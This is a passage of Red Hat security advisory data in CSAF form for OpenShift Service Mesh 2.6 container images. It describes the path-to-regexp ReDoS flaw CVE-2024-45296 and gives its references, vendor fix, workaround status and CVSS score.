"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "serve-static: Improper Sanitization in serve-static", }, { cve: "CVE-2024-45296", cwe: { id: "CWE-1333", name: "Inefficient Regular Expression Complexity", }, discovery_date: "2024-09-09T19:20:18.127723+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2310908", }, ], notes: [ { category: "description", text: "A flaw was found in path-to-regexp package, where it turns path strings into regular expressions. In certain cases, path-to-regexp will output a regular expression that can be exploited to cause poor performance. Because JavaScript is single-threaded and regex matching runs on the main thread, poor performance will block the event loop and lead to a denial of service (DoS).", title: "Vulnerability description", }, { category: "summary", text: "path-to-regexp: Backtracking regular expressions cause ReDoS", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-45296", }, { category: "external", summary: "RHBZ#2310908", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310908", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-45296", url: "https://www.cve.org/CVERecord?id=CVE-2024-45296", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-45296", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-45296", }, { category: "external", summary: "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f", url: "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f", }, { category: "external", summary: "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6", url: "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6", }, { category: "external", summary: "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j", url: "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j", }, ], release_date: "2024-09-09T19:15:13.330000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:24:48+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7726", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5.3, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", version: "3.1", }, products: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", 